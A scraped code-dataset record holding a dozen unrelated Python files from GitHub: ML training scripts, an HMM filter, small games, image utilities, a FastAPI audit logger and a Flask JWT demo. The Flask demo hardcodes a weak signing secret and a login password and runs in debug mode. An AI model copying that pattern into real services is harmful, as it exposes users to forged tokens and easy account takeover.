Data_path / 'vocab/domainSpecific_Yelp_itos'],\n drop_mult=0.5, opt_func='Adam', loss_func=None, metrics=[accuracy], true_wd=True, bn_wd=True, wd=0.01,\n train_bn=True, lr=3e-4, model_save_path='DataLoader/models/modelRevFine',\n vocab_save_path='vocab/itosRevFine.pkl', encoding_save_path='encoding/encoderRevFine',\n DataLoaderLM_save_path='DataLoader/data_lmYelpFine.pkl',\n DataLoaderCl_save_path='DataLoader/data_clYelpFine.pkl', cuda_id=0, vocab_weight_balance=vocab_update)\n\n\nif args.classifier:\n data_path = DATA_DIR / 'phase1/bml'\n\n df_trnRev, df_valRev = load_data_training(data_path=data_path, n_labels=10, n_textfield=1)\n\n dataRev_clas = get_Clas_DataLoader(path=data_path, data_trn=df_trnRev, data_val=df_valRev, n_labels=10,\n max_vocab=70000,\n min_freq=1,\n use_pretrain_vocab=True,\n pretrain_path=Data_path / 'DataLoader',\n DataLoader_name='data_lm_fineTune_Rev.pkl', Save_Path = Data_path, DataLoader_save_path = 'DataLoader/data_cl_fineTune_Rev.pkl', bs=8)\n\n train_clas(work_dir=Data_path, data_loader_folder='DataLoader', dataLoader_name='data_cl_fineTune_Rev.pkl', n_labels=10,\n arch=AWD_LSTM, custom_config=True, pretrained=True,\n pretrained_fnames=[Data_path / 'encoding/encoderRevFine', Data_path / 'vocab/fineTune_Rev_itos'],\n drop_mult=0.5, opt_func='Adam', loss_func=None, metrics=[accuracy], true_wd=True, bn_wd=True, wd=0.01,\n train_bn=True, lr=1e-2, model_save_path='DataLoader/models/modelClassRev', encoding_save_path='encoding/encoderClasRev',\n cuda_id=0, use_discriminative=True, chain_thaw=True)\n\n\n\n\n\n\n\n","repo_name":"chetan-punchh/AWD","sub_path":"scripts/main_script.py","file_name":"main_script.py","file_ext":"py","file_size_in_byte":9059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"41570648654","text":"\"\"\" Unchanneled Path Length (structured).\n\nCompute the unchanneled path length (UPL), i.e., the shortest distance to a\n channel node (rectangular \"raster\" grids).\n\nAuthor: Olivier Gourgue (University of Antwerp & Boston University).\n\n\"\"\"\n\nimport numpy as np\nfrom scipy import spatial\n\n\n################################################################################\n# Unchanneled path length. #####################################################\n################################################################################\n\ndef upl(x, y, chn, mask = None):\n \"\"\"Compute the unchanneled path length (UPL).\n\n Args:\n x, y (NumPy arrays): Grid cell coordinates (1D).\n chn (NumPy array, boolean): True for channel nodes, False otherwise\n (first dimension for x, second dimension for y), for one (2D array)\n or several time steps (3D array, second dimension for time).\n mask (NumPy array, boolean): True at grid cells where UPL is not\n computed (same shape as chn for one time step; default to None, that\n is, no mask).\n\n Returns:\n NumPy array: Unchanneled path length (same shape as chn).\n \"\"\"\n\n # Number of grid cells.\n nx = chn.shape[0]\n ny = chn.shape[1]\n\n # Reshape chn as a 3D array, if needed.\n if chn.ndim == 2:\n chn = chn.reshape((nx, ny, 1))\n\n # Initialize.\n upl = np.zeros(chn.shape)\n\n # Number of time steps.\n nt = chn.shape[2]\n\n # Default mask.\n if mask is None:\n mask = np.zeros((nx, ny), dtype = bool)\n\n # Area of interest.\n not_mask = np.logical_not(mask)\n\n # Mesh grid.\n xx, yy = np.meshgrid(x, y, indexing = 'ij')\n\n # Loop over time steps.\n for i in range(nt):\n\n # Reshape into 1D arrays.\n chn_flat = chn[:, :, i].reshape(-1)\n not_mask_flat = not_mask.reshape(-1)\n xx_flat = xx.reshape(-1)\n yy_flat = yy.reshape(-1)\n upl_flat = upl[:, :, i].reshape(-1)\n\n # Channel node indices and coordinates.\n ind_chn = np.flatnonzero(chn_flat * not_mask_flat)\n xy_chn = np.array([xx_flat[ind_chn], yy_flat[ind_chn]]).T\n\n # Platform node indices and coordinates.\n ind_plt = np.flatnonzero(np.logical_not(chn_flat) * not_mask_flat)\n xy_plt = np.array([xx_flat[ind_plt], yy_flat[ind_plt]]).T\n\n # UPL.\n if len(ind_chn) > 0:\n tree = spatial.KDTree(xy_chn)\n upl_plt, ind = tree.query(xy_plt)\n upl_flat[ind_plt] = upl_plt\n\n upl[:, :, i] = upl_flat.reshape((nx, ny))\n\n # Reshape as a 2D array, if needed.\n if nt == 1:\n upl = upl.reshape((nx, ny))\n\n return upl","repo_name":"ogourgue/tidalgeopro","sub_path":"upl_structured.py","file_name":"upl_structured.py","file_ext":"py","file_size_in_byte":2661,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"30098890909","text":"#$env:FLASK_APP = \"main\" --> ${API}:FLASK_APP = \"main\" \r\n#API/Scripts/activate.bat\r\n#from application import db\r\n#flask run\r\n\r\nfrom flask import Flask\r\nfrom flask_sqlalchemy import SQLAlchemy\r\nfrom flask import request\r\n\r\nfrom flask import jsonify\r\nfrom flask import make_response\r\n\r\nimport jwt\r\nimport datetime\r\n\r\nfrom functools import wraps\r\n\r\n\r\napp = Flask(__name__)\r\n\r\n\r\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///data.db'\r\napp.config['SECRET_KEY'] = 'mysecretkey'\r\ndb = SQLAlchemy(app)\r\n\r\n\r\n\r\n\r\nclass Drink(db.Model):\r\n id = db.Column(db.Integer, primary_key=True)\r\n name = db.Column(db.String(80), unique=True, nullable=False)\r\n description = db.Column(db.String(120))\r\n\r\n def __repr__(self):\r\n return f\"{self.name} - {self.description}\"\r\n\r\n@app.route('/')\r\ndef index():\r\n return 'Hello!'\r\n\r\n@app.route('/drinks')\r\ndef get_drinks():\r\n drinks = Drink.query.all()\r\n\r\n output = []\r\n for drink in drinks:\r\n drink_data = {'name':drink.name, 'description': drink.description}\r\n output.append(drink_data)\r\n return {\"drinks\": output}\r\n\r\n@app.route('/drinks/')\r\ndef get_dring(id):\r\n drink = Drink.query.get_or_404(id)\r\n return {\"name\":drink.name, \"description\":drink.description}\r\n\r\n\r\n@app.route('/drinks', methods=['POST'])\r\ndef add_drink():\r\n drink = Drink(name=request.json[\"name\"], description=request.json[\"description\"])\r\n db.session.add(drink)\r\n db.session.commit()\r\n return {'id':drink.id}\r\n\r\n@app.route('/drinks/', methods=['DELETE'])\r\ndef delete_drink(id):\r\n drink = Drink.query.get(id)\r\n if drink is None:\r\n return {\"error\":\"not found\"}\r\n db.session.delete(drink)\r\n db.session.commit()\r\n return {\"message\":\"Deleted\"}\r\n\r\n\r\n@app.route('/login')\r\ndef login():\r\n auth = request.authorization\r\n\r\n if auth and auth.password == 'password1':\r\n token = jwt.encode({'user' : auth.username, 'exp' : datetime.datetime.utcnow() + datetime.timedelta(minutes=5)}, app.config['SECRET_KEY'])\r\n return jsonify({'token' : token})\r\n\r\n return make_response('Could not verify!', 401, {'WWW-Authenticate' : 'Basic realm=\"Login Required\"'})\r\n\r\ndef token_required(f):\r\n @wraps(f)\r\n def decorated(*args, **kwargs):\r\n token = request.args.get('token')\r\n if not token:\r\n return {'message' : 'Token is missing'}, 403\r\n\r\n try:\r\n data = jwt.decode(token, app.config['SECRET_KEY'], algorithms='HS256')\r\n \r\n except:\r\n return {'message' : 'Token is invalid'}, 403\r\n\r\n return f(*args, **kwargs)\r\n return decorated\r\n \r\n@app.route('/unprotected')\r\ndef unprotected():\r\n return {'message' : 'Anyone can see this.'}\r\n\r\n\r\n\r\n@app.route('/protected')\r\n\r\n@token_required\r\ndef protected():\r\n return {'message' : 'Availavle with valid tokens.'}\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)","repo_name":"Brooona/RestAPI","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"1048069080","text":"import logging\n\nimport PySide6.QtWidgets\n\nfrom PySide6.QtWidgets import QRadioButton, QCheckBox, QListWidget, QSizePolicy,QComboBox\nfrom matplotlib.backends.backend_qt import NavigationToolbar2QT as NavigationToolbar\nfrom matplotlib.backends.backend_qtagg import FigureCanvasQTAgg\nfrom matplotlib.figure import Figure\n\nfrom common.common import LimitType, UniteType, Types, index_of\nfrom common.simpleexceptioncontext import simple_exception_handling\nfrom config import config\nfrom gui.forminitializerinterface import FormInitializerInterface\nfrom gui.formobserver import FormObserver\nfrom gui.formobserverinterface import ResetRanges\nfrom gui.listobserver import additems\n\n\nclass FormInitializer(FormObserver, FormInitializerInterface):\n\n @property\n def window(self):\n return self.wind\n\n @window.setter\n def window(self, value):\n self.wind = value\n\n\n\n def __init__(self):\n super().__init__()\n\n @property\n def figure(self):\n return self._canvas.figure\n\n @property\n def axes(self):\n return self._canvas.ax\n\n def prepare_graph_widget(self):\n #tabWidget = self.window.tabWidget_8Page1 # type: QTabWidget\n\n self._canvas = MplCanvas()\n #sc.manager.window.move(1,1)\n toolbar = NavigationToolbar(self._canvas, self.window)\n #layout = QVBoxLayout()\n self.window.graph_groupbox.layout().addWidget(toolbar)\n self.window.graph_groupbox.layout().addWidget(self._canvas)\n\n\n def after_load(self):\n self.rad_types = self.window.findChildren(QRadioButton) + self.window.findChildren(QCheckBox,\n name=\"unite_ADDPROT\") + self.window.findChildren(\n QCheckBox, name=\"unite_ADDTOTAL\") + self.window.findChildren(QCheckBox, name=\"COMPARE\")\n self.prepare_graph_widget()\n self.window.filterrangesection.setTitle(\"Filter Range\")\n self.window.filterrangesection.setContentLayout(self.window.formLayout)\n\n\n\n\n def set_all_toggled_value(self):\n type= self.graphObj.params.type\n unite = self.graphObj.params.unite_by_group\n limit_by= self.graphObj.params.limit_by\n for rad in self.rad_types:\n name=rad.objectName()\n #func= rad.setChecked if type(rad)==QCheckBox else rad.setCheckState\n #x : QCheckBox\n if name.startswith('limit'):\n name = name[len('limit') + 1:]\n rad.setChecked(bool(limit_by & getattr(LimitType,name)))\n elif name.startswith('unite'):\n name = name[len('unite') + 1:]\n rad.setChecked( bool(unite & getattr(UniteType,name)))\n else:\n try:\n rad.setChecked(bool(type & getattr(Types, name)))\n except:\n pass\n\n def setup_controls_from_params(self,initial=True,isinitialforstock=None):\n self.ignore_cat_changes = False\n self.ignore_updates_for_now=True\n self.set_all_toggled_value()\n self.set_groups_values(isinitialforstock=initial if isinitialforstock==None else isinitialforstock)\n\n self.window.daterangepicker.update_prop()\n self.window.startdate.setDateTime(self.graphObj.mindate)\n self.window.enddate.setDateTime(self.graphObj.maxdate)\n self.window.daterangepicker.start=self.graphObj.mindate\n self.window.daterangepicker.end = self.graphObj.maxdate\n self.window.daterangepicker.update_obj()\n if not initial:\n self.window.daterangepicker.datevalue= (self.graphObj.params.fromdate,self.graphObj.params.todate)\n else:\n self.window.daterangepicker.dateValueChanged.connect(self.date_changed)\n self.window.use_groups.setChecked(self.graphObj.params.use_groups)\n self.window.findChild(QCheckBox, name=\"usereferncestock\").setChecked(self.graphObj.params.use_ext)\n self.window.findChild(QCheckBox, name=\"limit_to_port\").setChecked(self.graphObj.params.limit_to_portfolio)\n if self.graphObj.params.adjust_to_currency:\n self.window.findChild(QCheckBox, name=\"adjust_currency\").setCheckState(PySide6.QtCore.Qt.CheckState.Checked)\n elif self.graphObj.params.adjusted_for_base_cur:\n self.window.findChild(QCheckBox, name=\"adjust_currency\").setCheckState(PySide6.QtCore.Qt.CheckState.PartiallyChecked)\n else:\n self.window.findChild(QCheckBox, name=\"adjust_currency\").setCheckState(PySide6.QtCore.Qt.CheckState.Unchecked)\n\n\n self.window.home_currency_combo.clear()\n self.window.home_currency_combo.addItems(list(config.Symbols.DefaultCurr), )\n\n\n if not initial and self.graphObj.params.compare_with:\n wc = self.window.comparebox\n\n l=[wc.itemText(x) for x in range(wc.count())]\n ind=index_of(self.graphObj.params.compare_with,l)\n self.window.comparebox.setCurrentIndex(ind)\n if ind==-1:\n self.window.comparebox.setCurrentText(self.graphObj.params.compare_with)\n self.window.findChild(QCheckBox, name=\"COMPARE\").setChecked(self.graphObj.params.type & Types.COMPARE)\n if initial:\n self.load_existing_graphs()\n self.ignore_updates_for_now = False\n\n def set_groups_values(self, isinit=1,isinitialforstock=1):\n b=False\n wc: QComboBox= self.window.categoryCombo\n self.ignore_cat_changes = True\n if self.graphObj.Categories!=[wc.itemText(x) for x in range(wc.count())]:\n b=True\n\n wc.clear()\n wc.addItems(self.graphObj.Categories) #sorry\n\n if isinitialforstock and self.graphObj.params.cur_category:\n wc.setCurrentIndex(index_of( self.graphObj.params.cur_category ,self.graphObj.Categories) )\n self.ignore_cat_changes = False\n\n options = list(self.graphObj.Groups.keys())\n value = self.graphObj.params.groups if self.graphObj.params.groups != None else list()\n wc= self.window.groups\n if options != [wc.item(x).text() for x in range(wc.count())]:\n b=True\n wc.clear()\n wc.addItems(options) # sorry\n if not b and not isinit:\n return\n #self.window.groups.addItems(options)\n self.window.groups.setSelectionMode(PySide6.QtWidgets.QAbstractItemView.SelectionMode.MultiSelection)\n # self.groups_changed()\n self.update_stock_list(isinitialforstock and isinit)\n self.update_ranges(isinit+1) #if intial then force\n if isinit:\n self.select_rows(self.window.groups, [options.index(v) for v in value])\n\n def update_rangeb(self,minmax):\n self.disable_slider_values_updates=True\n if minmax[0]==minmax[1]:\n minmax = (minmax[0],minmax[0]+0.1)\n self.window.min_crit.setRange(minmax[0], minmax[1])\n self.window.min_crit.setValue(minmax)\n self.disable_slider_values_updates = False\n\n def update_range_num(self,nuofoptions):\n if nuofoptions==0:\n nuofoptions=1\n self.disable_slider_values_updates=True\n self.window.max_num.setRange(0, nuofoptions)\n self.window.max_num.setValue((0, nuofoptions))\n self.disable_slider_values_updates = False\n\n def update_ranges(self,reset_type=ResetRanges.IfAPROP):\n nuofoptions = len(self.graphObj.colswithoutext)\n\n self.disable_slider_values_updates=True #convert to ..\n if nuofoptions==0:\n nuofoptions =1\n self.window.max_num.setRange(0, nuofoptions)\n\n if self.graphObj.minValue is None or self.graphObj.maxValue is None:\n self.disable_slider_values_updates = False\n return\n if self.graphObj.minValue==self.graphObj.maxValue and self.graphObj.maxValue==0:\n logging.debug(('bad range'))\n self.window.min_crit.setRange(self.graphObj.minValue, self.graphObj.maxValue+0.1)\n else:\n self.window.min_crit.setRange(self.graphObj.minValue, self.graphObj.maxValue)\n\n if reset_type==ResetRanges.FORCE:\n self.window.max_num.setValue((0, nuofoptions))\n self.window.min_crit.setValue((self.graphObj.minValue, self.graphObj.maxValue))\n self.disable_slider_values_updates = False\n\n @simple_exception_handling(err_description=\"Error in adding items\")\n def update_stock_list(self,isinitial=0,justorgs=False):\n org: QListWidget = self.window.orgstocks # type:\n \n if self.window.unite_NONE.isChecked() or not self.graphObj.params.use_groups:\n if self.graphObj.params.use_groups:\n org.clear()\n additems(org,self.graphObj.get_options_from_groups(self.graphObj.params.groups))\n elif isinitial:\n org.clear()\n additems(org,self.graphObj.params.selected_stocks)\n \n if justorgs:\n return\n \n\n alloptions= sorted(list(self.graphObj.usable_symbols)) #CompareEngine.get_options_from_groups([g for g in CompareEngine.Groups])\n \n #self._last_choice= self.window.comparebox.currentText()\n if isinitial:\n for comp in [self.window.comparebox,self.window.addstock] :\n comp.clear()\n comp.addItems(alloptions)\n \n \n \n \n \n #additems(org,self.graphObj.cols)\n refs: QListWidget = self.window.refstocks # type:\n refs.clear()\n additems(refs, self.graphObj.params.ext)\n\n\n\nclass MplCanvas(FigureCanvasQTAgg):\n def __init__(self):\n self.fig = Figure()\n self.ax = self.fig.add_subplot(111)\n FigureCanvasQTAgg.__init__(self, self.fig)\n FigureCanvasQTAgg.setSizePolicy(self, QSizePolicy.Expanding, QSizePolicy.Expanding)\n FigureCanvasQTAgg.updateGeometry(self)\n","repo_name":"eyalk11/compare-my-stocks","sub_path":"src/compare_my_stocks/gui/forminitializer.py","file_name":"forminitializer.py","file_ext":"py","file_size_in_byte":9971,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"77"} +{"seq_id":"35556166535","text":"import numpy as np\n\n# Implemting eq 15.12\ndef forward(T, O, msg):\n return normalize(O*T.T*msg)\n\n# Implemting eq 15.13\ndef backward(T, O, msg):\n return T*O*msg\n\n\ndef filtering(T, O_model, init_message, observations):\n # Initilize the fv_msg array with the init_message\n fv_messages = [ init_message ]\n\n # For every observation, calculate the next msg\n for e in observations:\n msg = forward(T, O_model[e], fv_messages[-1])\n fv_messages.append(msg)\n\n return fv_messages\n\n\ndef smoothing(T, O_model, init_message, observations):\n # Initilize the fv_msg array with the init_message\n fv_messages = [init_message]\n\n # For every observation, calculate the next msg\n for e in observations:\n msg = forward(T, O_model[e], fv_messages[-1])\n fv_messages.append(msg)\n\n # Initilize the b_msg array with 1's and the same shape as init_message\n b_msg = [ np.ones_like(init_message) ]*( len(observations)+1 )\n # Initiate the sv array\n sv = [None]*len(observations)\n\n # For every observation, calculate the smoothing estimate and next b_msg\n for i in range(len( observations )-1, -1, -1):\n sv[i] = normalize(np.multiply(fv_messages[i+1], b_msg[i+1]))\n b_msg[i] = backward(T, O_model[observations[i]], b_msg[i+1])\n return sv, b_msg\n\n\n# Normalize the probabilities\ndef normalize(probs):\n total = probs.sum()\n alpha = 1/total\n return alpha*probs\n\n\nif __name__ == '__main__':\n # Dynamic/transition model\n T = np.matrix('0.7 0.3; 0.3 0.7')\n\n # Observation/sensor model\n O = [np.matrix('0.1 0; 0 0.8'), # P(Umberella = False)\n np.matrix('0.9 0; 0 0.2')] # P(Umberella = True)\n\n # Problems, where 1 means the umberella is shown and 0 that it is not\n prob_1 = [1, 1]\n prob_2 = [1, 1, 0, 1, 1]\n\n # Printing\n print(\"Filtering prob 1\")\n print(filtering(T, O, np.matrix('0.5; 0.5'), prob_1))\n print(\"Filtering prob 2\")\n print(filtering(T, O, np.matrix('0.5; 0.5'), prob_2))\n print(\"Smoothing prob 1\")\n print(\"sv: \", smoothing(T, O, np.matrix('0.5; 0.5'), prob_1)[0])\n print(\"b_msg: \", smoothing(T, O, np.matrix('0.5; 0.5'), prob_1)[1])\n print(\"Smoothing prob 1\")\n print(\"sv: \", smoothing(T, O, np.matrix('0.5; 0.5'), prob_2)[0])\n print(\"b_msg: \", smoothing(T, O, np.matrix('0.5; 0.5'), prob_2)[1])\n","repo_name":"kattn/ai_methods","sub_path":"ass2/markov_process.py","file_name":"markov_process.py","file_ext":"py","file_size_in_byte":2335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29309252169","text":"import random\nnumero_aleatorio=random.randint(1,20)\nnumero_ingresado=int(input(\"Ingrese su numero:\"))\nadivinaste=True\nintentos=5\nwhile adivinaste and intentos>=1:\n if numero_ingresado==numero_aleatorio:\n adivinaste=False\n print(\"Adivinaste, mi número era\",numero_aleatorio)\n else:\n if intentos>=1:\n intentos=intentos-1\n adivinaste=True\n numero_ingresado=int(input(\"Intente otro:\"))\nif intentos<1:\n print(\"No adivinaste, mi número era\",numero_aleatorio)\n \n\n\n","repo_name":"pabloschwarzenberg/grader","sub_path":"hito1_ej12/hito1_ej12_39603897150cf254dc8143a2096e9352.py","file_name":"hito1_ej12_39603897150cf254dc8143a2096e9352.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"37597010308","text":"#Minimum cost to reach destination from train in directed acyclic graph\n\nINF = 2147483647\nn = 4 \n\ndef minCost(cost):\n dist = [INF]*n\n dist[0] = 0\n \n for i in range(n):\n for j in range(i+1,n):\n if dist[j] > dist[i] + cost[i][j]:\n dist[j] = dist[i] + cost[i][j]\n \n return dist[n-1]\n \ncost= [ [0, 15, 80, 90],\n [INF, 0, 40, 50],\n [INF, INF, 0, 70],\n [INF, INF, INF, 0]]\n \nprint(minCost(cost))\n","repo_name":"Geeky-star/Graphstudy","sub_path":"minimum cost to reach destination.py","file_name":"minimum cost to reach destination.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"1022592019","text":"#! /usr/bin/env python3\n\nimport numpy as np\nimport sys\n\nif __name__ == \"__main__\":\n\tif len(sys.argv) < 3:\n\t\tprint(\"expected at least 2 arguments [src1] [src2] ...\")\n\t\texit(1)\n\tresults = []\n\tfor file in sys.argv[1:]:\n\t\tans = np.load(file)\n\t\tresults.append(ans)\n\tdiffs = 0\n\tfor (i, lb) in enumerate(results[0]):\n\t\tnotice = False\n\t\tanss = [lb]\n\t\tfor dif in results[1:]:\n\t\t\tmyans = dif[i]\n\t\t\tif myans != lb:\n\t\t\t\tnotice = True\n\t\t\tanss.append(myans)\n\t\tif notice:\n\t\t\tdiffs += 1\n\t\t\tprint(\"No: {} predicts: {}\".format(i, anss))\n\tprint(\"Total diffs: {} out of {} ({:.2f}%)\".format(diffs, len(results[0]), diffs*100/len(results[0])))\n\n","repo_name":"George0828Zhang/Sound-Class","sub_path":"comp.py","file_name":"comp.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"40827433929","text":"from PIL import Image\nimport os\n\n# path to directory containing tif images\ntif_dir = '/data_1/train/gt'\n\n# create directory for saving png images\nif not os.path.exists('/data_1/train/Label_ori'):\n os.makedirs('/data_1/train/Label_ori')\n\n# loop through all tif images in directory and convert to png\nfor file_name in os.listdir(tif_dir):\n if file_name.endswith('.tif'):\n # open tif image\n with Image.open(os.path.join(tif_dir, file_name)) as im:\n # convert to binary image\n binary_im = im.convert('1')\n # save as png image\n png_file_name = file_name[:-4] + '_mask.png'\n png_path = os.path.join('/data_1/train/Label_ori', png_file_name)\n binary_im.save(png_path)\n","repo_name":"giganticpower/WCTNet","sub_path":"data_1/label_transfor.py","file_name":"label_transfor.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"21218703255","text":"from datetime import datetime\nfrom fastapi import Request\n\n\nasync def audit_log_transaction(request: Request, call_next):\n action = f\"{request.method} {request.url.path}\"\n timestamp = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n client_ip = request.client.host\n query_params = dict(request.query_params)\n path_params = dict(request.path_params)\n\n log_message = f\"\"\"{timestamp} - Action: {action}, IP: {client_ip}\n Query Parameters: {query_params}\n Path Parameters: {path_params}\n \"\"\"\n\n with open(\"audit_log_transaction.log\", \"a\", encoding=\"utf-8\") as log_file:\n log_file.write(log_message + \"\\n\")\n\n response = await call_next(request)\n return response\n","repo_name":"leonardolima-escolar/crud-fastapi-2","sub_path":"app/middlewares/audit_log_transaction.py","file_name":"audit_log_transaction.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"41591157210","text":"import re, random, math\n\nart = [\n \" __________\",\n \" |/ |\",\n \" O |\",\n \" /|\\ |\",\n \" | |\",\n \" / \\ |\",\n \"__________/|\",\n \"| | | | | \\|\"\n]\n\nwords = open(\"./words.txt\").read().split(\"\\n\")\n\nscore = 0\n\nguessed = []\n\nclass scoreboard:\n wins = 0\n losses = 0\n\ntotalScore = scoreboard()\n\ncont = True\n\nendChallenge = False\n\nguess = \"\"\n\nword = \"\"\n\nspacer = \"\\n\\n\\n\"\n\ndef printHangman(s):\n if s > 0:\n for line in art[0:s]:\n print(line)\n print(\"\")\n\nwhile cont:\n word = words[math.floor(random.random() * len(words))]\n guessed = [\"_\"] * len(word)\n score = 0\n endChallenge = False\n while not endChallenge:\n print(spacer)\n print(\"Hangman! Guess the word by inputting guesses as to what letters it contains.\\n\")\n printHangman(score)\n for c in guessed:\n print(c, end = \" \")\n print(\"\\n\")\n guess = \"\"\n while len(guess) != 1 or re.search(\"[^a-zA-Z]\", guess):\n guess = input(\"Input a one-letter guess: \")\n if guess in word and guess not in guessed:\n for i in range(len(word)):\n if word[i] == guess:\n guessed[i] = guess\n if \"_\" not in guessed:\n print(f\"\\nYou did it!\\nThe word is {word}, and you didn't get hanged!\")\n totalScore.wins += 1\n endChallenge = True\n else:\n if score < len(art) - 1:\n if guess not in guessed:\n print(\"\\nGood try! But wrong, unfortunately. Try again!\")\n else:\n print(\"\\nYou already guessed that! I have to take points away for that.\")\n score += 1\n else:\n print(\"\\nYou lose! You ran out of guesses. I can't show you the word, that would be cheating.\")\n printHangman(score + 1)\n totalScore.losses += 1\n endChallenge = True\n print(spacer)\n print(f\"Current score:\\n Games won: {totalScore.wins}\\n Games lost: {totalScore.losses}\"\n + f\"\\n Percent of games won: {(totalScore.wins / (totalScore.wins + totalScore.losses)) * 100}%\")\n print(spacer)\n cont = (input(\"Type \\\"y\\\" to keep playing or anything else to exit: \") == \"y\")","repo_name":"Matthew-MT/AdvPy-mmontoni-till","sub_path":"hangman/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17543210996","text":"'''\nECE276A WI19 HW1\nBlue Barrel Detector\n'''\n\nimport os, cv2\nfrom skimage.measure import label, regionprops\nimport numpy as np\n\nclass BarrelDetector():\n\tdef __init__(self):\n\t\tself.barrel_blue_mean = np.load('trained_parameters/barrel_blue_mean.npy')\n\t\tself.barrel_blue_cov = np.load('trained_parameters/barrel_blue_cov.npy')\n\t\tself.black_mean = np.load('trained_parameters/black_mean.npy')\n\t\tself.black_cov = np.load('trained_parameters/black_cov.npy')\n\t\tself.green_mean = np.load('trained_parameters/green_mean.npy')\n\t\tself.green_cov = np.load('trained_parameters/green_cov.npy')\n\t\tself.red_mean = np.load('trained_parameters/red_mean.npy')\n\t\tself.red_cov = np.load('trained_parameters/red_cov.npy')\n\t\tself.white_mean = np.load('trained_parameters/white_mean.npy')\n\t\tself.white_cov = np.load('trained_parameters/white_cov.npy')\n\t\tself.yellow_mean = np.load('trained_parameters/yellow_mean.npy')\n\t\tself.yellow_cov = np.load('trained_parameters/yellow_cov.npy')\n\t\tself.target_blue_mean = np.load('trained_parameters/target_blue_mean.npy')\n\t\tself.target_blue_cov = np.load('trained_parameters/target_blue_cov.npy')\n\t\tself.not_target_blue_mean = np.load('trained_parameters/not_target_blue_mean.npy')\n\t\tself.not_target_blue_cov = np.load('trained_parameters/not_target_blue_cov.npy')\n\t\tself.kettle_blue_mean = np.load('trained_parameters/kettle_blue_mean.npy')\n\t\tself.kettle_blue_cov = np.load('trained_parameters/kettle_blue_cov.npy')\n\t\tself.stick_blue_mean = np.load('trained_parameters/stick_blue_mean.npy')\n\t\tself.stick_blue_cov = np.load('trained_parameters/stick_blue_cov.npy')\n\t\tself.wall_blue_mean = np.load('trained_parameters/wall_blue_mean.npy')\n\t\tself.wall_blue_cov = np.load('trained_parameters/wall_blue_cov.npy')\n\t\tself.carpet_blue_mean = np.load('trained_parameters/carpet_blue_mean.npy')\n\t\tself.carpet_blue_cov = np.load('trained_parameters/carpet_blue_cov.npy')\n\n\tdef segment_image(self, img):\n\t\t#current_image = np.zeros((800,1200,3))\n\t\tcurrent_image = np.asarray(img)\n\t\t#current_image = np.asarray(cv2.cvtColor(img, cv2.COLOR_BGR2HSV))[:,:,0:2]\n\t\tcurrent_image = np.reshape(current_image,(960000,3))\n\t\tmask_img = np.zeros((800,1200))\n\t\tscores = np.zeros((800,1200,6))\n\t\tbarrel_blue_score = np.log(abs(np.linalg.det(self.barrel_blue_cov))) + np.reshape(np.sum(np.multiply(np.transpose(np.dot(current_image-self.barrel_blue_mean.transpose(),np.linalg.inv(self.barrel_blue_cov))),current_image.transpose()-self.barrel_blue_mean),axis=0),(800,1200))\n\t\tblack_score = np.log(abs(np.linalg.det(self.black_cov))) + np.reshape(np.sum(np.multiply(np.transpose(np.dot(current_image-self.black_mean.transpose(),np.linalg.inv(self.black_cov))),current_image.transpose()-self.black_mean),axis=0),(800,1200))\n\t\tgreen_score = np.log(abs(np.linalg.det(self.green_cov))) + np.reshape(np.sum(np.multiply(np.transpose(np.dot(current_image-self.green_mean.transpose(),np.linalg.inv(self.green_cov))),current_image.transpose()-self.green_mean),axis=0),(800,1200))\n\t\tred_score = np.log(abs(np.linalg.det(self.red_cov))) + np.reshape(np.sum(np.multiply(np.transpose(np.dot(current_image-self.red_mean.transpose(),np.linalg.inv(self.red_cov))),current_image.transpose()-self.red_mean),axis=0),(800,1200))\n\t\twhite_score = np.log(abs(np.linalg.det(self.white_cov))) + np.reshape(np.sum(np.multiply(np.transpose(np.dot(current_image-self.white_mean.transpose(),np.linalg.inv(self.white_cov))),current_image.transpose()-self.white_mean),axis=0),(800,1200))\n\t\tyellow_score = np.log(abs(np.linalg.det(self.yellow_cov))) + np.reshape(np.sum(np.multiply(np.transpose(np.dot(current_image-self.yellow_mean.transpose(),np.linalg.inv(self.yellow_cov))),current_image.transpose()-self.yellow_mean),axis=0),(800,1200))\n\t\tscores[:,:,0] = barrel_blue_score\n\t\tscores[:,:,1] = black_score\n\t\tscores[:,:,2] = green_score\n\t\tscores[:,:,3] = red_score\n\t\tscores[:,:,4] = white_score\n\t\tscores[:,:,5] = yellow_score\n\t\tscores_m = np.argmin(scores,axis=2)\n\t\tmask_img[np.where(scores_m==0)] = 1\n\t\t#kernel = np.ones((5,5))\n\t\t#mask_img = cv2.morphologyEx(mask_img, cv2.MORPH_OPEN, kernel)\n\n\n\t\tcurrent_image = np.asarray(cv2.cvtColor(img, cv2.COLOR_BGR2HSV))\n\t\tv_channel = current_image[:,:,2]\n\t\taverage_illuminance = np.mean(np.mean(v_channel[np.where(mask_img==1)]))\n\t\tprint(average_illuminance)\n\t\t#current_image = current_image[:,:,0:2] #drop the v info\n\t\tcurrent_image = 